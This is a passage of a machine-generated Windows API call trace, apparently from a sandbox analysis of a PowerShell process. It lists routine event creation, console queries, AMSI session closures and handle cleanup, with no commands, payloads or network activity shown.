bInitialState=0, lpName=0x0) returned 0x828 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x830 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x834 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x838 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x83c [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x840 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x844 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x848 [0292.137] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c4 [0292.137] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c8 [0292.137] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9cc [0292.137] SetEvent (hEvent=0x84c) returned 1 [0292.139] SetEvent (hEvent=0x828) returned 1 [0292.139] SetEvent (hEvent=0x824) returned 1 [0292.139] SetEvent (hEvent=0x820) returned 1 [0292.139] SetEvent (hEvent=0x82c) returned 1 [0295.222] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0295.223] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0295.224] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0295.224] AmsiCloseSession () returned 0xba78b0 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x964 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9d0 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x40c [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x960 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x410 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x804 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7fc [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f8 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7f4 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7f0 [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7ec [0295.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x808 [0295.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x80c [0295.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x87c [0295.226] SetEvent (hEvent=0x84c) returned 1 [0295.227] SetEvent (hEvent=0x960) returned 1 [0295.227] SetEvent (hEvent=0x964) returned 1 [0295.227] SetEvent (hEvent=0x9d0) returned 1 [0295.227] SetEvent (hEvent=0x40c) returned 1 [0297.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0297.257] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0297.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0297.258] AmsiCloseSession () returned 0xba78b0 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x750 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x878 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x880 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x884 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x890 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x894 [0297.259] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x898 [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x89c [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8a0 [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8a4 [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a8 [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8ac [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8b0 [0297.260] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x968 [0297.261] SetEvent (hEvent=0x84c) returned 1 [0297.262] SetEvent (hEvent=0x884) returned 1 [0297.262] SetEvent (hEvent=0x750) returned 1 [0297.262] SetEvent (hEvent=0x878) returned 1 [0297.262] SetEvent (hEvent=0x880) returned 1 [0299.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0299.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0299.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0299.387] AmsiCloseSession () returned 0xba78b0 [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4 [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x970 [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9dc [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x270 [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5d8 [0299.387] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5dc [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d8 [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e0 [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa14 [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa18 [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa4c [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa50 [0299.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa20 [0299.388] SetEvent (hEvent=0x84c) returned 1 [0299.389] SetEvent (hEvent=0x270) returned 1 [0299.389] SetEvent (hEvent=0x9d4) returned 1 [0299.389] SetEvent (hEvent=0x970) returned 1 [0299.389] SetEvent (hEvent=0x9dc) returned 1 [0302.349] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0302.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0302.352] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0302.352] AmsiCloseSession () returned 0xba78b0 [0302.352] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa28 [0302.352] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa1c [0302.352] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8bc [0302.352] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa24 [0302.352] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8b8 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8c4 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8c0 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8c8 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8cc [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8d0 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8d4 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8d8 [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8dc [0302.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e0 [0302.353] SetEvent (hEvent=0x84c) returned 1 [0302.354] SetEvent (hEvent=0xa24) returned 1 [0302.354] SetEvent (hEvent=0xa28) returned 1 [0302.354] SetEvent (hEvent=0xa1c) returned 1 [0302.354] SetEvent (hEvent=0x8bc) returned 1 [0304.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0304.457] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0304.458] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0304.459] AmsiCloseSession () returned 0xba78b0 [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8e8 [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8e4 [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa2c [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8ec [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa30 [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa34 [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa38 [0304.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x97c [0304.460] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x978 [0304.460] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x974 [0304.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x984 [0304.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x980 [0304.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x988 [0304.460] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x98c [0304.460] SetEvent (hEvent=0x84c) returned 1 [0304.461] SetEvent (hEvent=0x8ec) returned 1 [0304.461] SetEvent (hEvent=0x8e8) returned 1 [0304.461] SetEvent (hEvent=0x8e4) returned 1 [0304.461] SetEvent (hEvent=0xa2c) returned 1 [0306.372] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0306.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0306.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0306.374] AmsiCloseSession () returned 0xba78b0 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x994 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x990 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8f4 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x998 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8f0 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8fc [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8f8 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x900 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x904 [0306.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x908 [0306.376] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90c [0306.376] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x910 [0306.376] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x914 [0306.376] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x918 [0306.376] SetEvent (hEvent=0x84c) returned 1 [0306.377] SetEvent (hEvent=0x998) returned 1 [0306.377] SetEvent (hEvent=0x994) returned 1 [0306.377] SetEvent (hEvent=0x990) returned 1 [0306.377] SetEvent (hEvent=0x8f4) returned 1 [0307.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0307.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0307.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0307.979] AmsiCloseSession () returned 0xba78b0 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x920 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x91c [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x924 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9a0 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9a4 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9a8 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa3c [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa40 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa44 [0307.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa48 [0307.981] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9e8 [0307.981] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9e4 [0307.981] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9f0 [0307.981] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9ec [0307.981] SetEvent (hEvent=0x84c) returned 1 [0307.982] SetEvent (hEvent=0x9a0) returned 1 [0307.982] SetEvent (hEvent=0x920) returned 1 [0307.982] SetEvent (hEvent=0x91c) returned 1 [0307.982] SetEvent (hEvent=0x924) returned 1 [0309.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0309.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0309.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0309.506] AmsiCloseSession () returned 0xba78b0 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9f8 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9f4 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x99c [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x928 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x92c [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x934 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x930 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x938 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x93c [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x940 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x944 [0309.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x948 [0309.508] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x94c [0309.508] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x950 [0309.508] SetEvent (hEvent=0x84c) returned 1 [0309.508] SetEvent (hEvent=0x928) returned 1 [0309.508] SetEvent (hEvent=0x9f8) returned 1 [0309.508] SetEvent (hEvent=0x9f4) returned 1 [0309.509] SetEvent (hEvent=0x99c) returned 1 [0311.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0311.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0311.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0311.539] AmsiCloseSession () returned 0xba78b0 [0311.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x958 [0311.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x954 [0311.539] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9fc [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x95c [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa00 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa04 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa90 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa94 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa98 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa9c [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xaa0 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xaa4 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xaa8 [0311.540] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xaac [0311.541] SetEvent (hEvent=0x84c) returned 1 [0311.541] SetEvent (hEvent=0x95c) returned 1 [0311.541] SetEvent (hEvent=0x958) returned 1 [0311.541] SetEvent (hEvent=0x954) returned 1 [0311.541] SetEvent (hEvent=0x9fc) returned 1 [0313.901] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0313.904] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0313.905] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0313.905] AmsiCloseSession () returned 0xba78b0 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xab4 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xab0 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xabc [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xab8 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac0 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xac4 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xac8 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xacc [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xad0 [0313.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xad4 [0313.907] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xad8 [0313.907] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xadc [0313.907] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xae0 [0313.907] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xae4 [0313.907] SetEvent (hEvent=0x84c) returned 1 [0313.908] SetEvent (hEvent=0xab8) returned 1 [0313.908] SetEvent (hEvent=0xab4) returned 1 [0313.908] SetEvent (hEvent=0xab0) returned 1 [0313.908] SetEvent (hEvent=0xabc) returned 1 Thread: id = 58 os_tid = 0x13a8 Thread: id = 59 os_tid = 0x1390 Thread: id = 60 os_tid = 0x1388 [0238.071] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0238.071] RoInitialize () returned 0x1 [0238.071] RoUninitialize () returned 0x0 [0244.541] CoGetContextToken (in: pToken=0xfcf4c0 | out: pToken=0xfcf4c0) returned 0x0 [0244.541] CoGetContextToken (in: pToken=0xfcf440 | out: pToken=0xfcf440) returned 0x0 [0244.541] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0244.541] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0244.542] CloseHandle (hObject=0x5f8) returned 1 [0244.544] CloseHandle (hObject=0x60c) returned 1 [0244.544] CertFreeCertificateContext (pCertContext=0x8ebca8) returned 1 [0249.083] RegCloseKey (hKey=0x758) returned 0x0 [0249.084] RegCloseKey (hKey=0x6b0) returned 0x0 [0287.314] CloseHandle (hObject=0xa04) returned 1 [0287.315] CloseHandle (hObject=0xa00) returned 1 [0287.315] CloseHandle (hObject=0x9fc) returned 1 [0287.315] CloseHandle (hObject=0x95c) returned 1 [0287.315] CloseHandle (hObject=0x958) returned 1 [0287.315] CloseHandle (hObject=0x954) returned 1 [0287.316] CloseHandle (hObject=0x950) returned 1 [0287.316] CloseHandle (hObject=0x94c) returned 1 [0287.316] CloseHandle (hObject=0x948) returned 1 [0287.316] CloseHandle (hObject=0x944) returned 1 [0287.316] CloseHandle (hObject=0x940) returned 1 [0287.317] CloseHandle (hObject=0x93c) returned 1 [0287.317] CloseHandle (hObject=0x938) returned 1 [0287.317] CloseHandle (hObject=0x930) returned 1 [0287.317] CloseHandle (hObject=0x934) returned 1 [0287.317] CloseHandle (hObject=0x928) returned 1 [0287.318] CloseHandle (hObject=0x92c) returned 1 [0287.318] CloseHandle (hObject=0x9f8) returned 1 [0287.318] CloseHandle (hObject=0x9f4) returned 1 [0287.318] CloseHandle (hObject=0x9ec) returned 1 [0287.318] CloseHandle (hObject=0x9f0) returned 1 [0287.318] CloseHandle (hObject=0x9e4) returned 1 [0287.319] CloseHandle (hObject=0x9e8) returned 1 [0287.319] CloseHandle (hObject=0xa48) returned 1 [0287.319] CloseHandle (hObject=0xa44) returned 1 [0287.319] CloseHandle (hObject=0xa40) returned 1 [0287.319] CloseHandle (hObject=0xa3c) returned 1 [0287.320] CloseHandle (hObject=0x9a8) returned 1 [0287.320] CloseHandle (hObject=0x9a4) returned 1 [0287.320] CloseHandle (hObject=0x9a0) returned 1 [0287.320] CloseHandle (hObject=0x99c) returned 1 [0287.320] CloseHandle (hObject=0x924) returned 1 [0287.321] CloseHandle (hObject=0x920) returned 1 [0287.321] CloseHandle (hObject=0x91c) returned 1 [0287.321] CloseHandle (hObject=0x918) returned 1 [0287.321] CloseHandle (hObject=0x914) returned 1 [0287.321] CloseHandle (hObject=0x910) returned 1 [0287.322] CloseHandle (hObject=0x90c) returned 1 [0287.322] CloseHandle (hObject=0x908) returned 1 [0287.322] CloseHandle (hObject=0x904) returned 1 [0287.322] CloseHandle (hObject=0x900) returned 1 [0287.322] CloseHandle (hObject=0x8f8) returned 1 [0287.323] CloseHandle (hObject=0x8fc) returned 1 [0287.323] CloseHandle (hObject=0x8f0) returned 1 [0287.323] CloseHandle (hObject=0x8f4) returned 1 [0287.323] CloseHandle (hObject=0x998) returned 1 [0287.323] CloseHandle (hObject=0x994) returned 1 [0287.324] CloseHandle (hObject=0x990) returned 1 [0287.324] CloseHandle (hObject=0x98c) returned 1 [0287.324] CloseHandle (hObject=0x988) returned 1 [0287.324] CloseHandle (hObject=0x980) returned 1 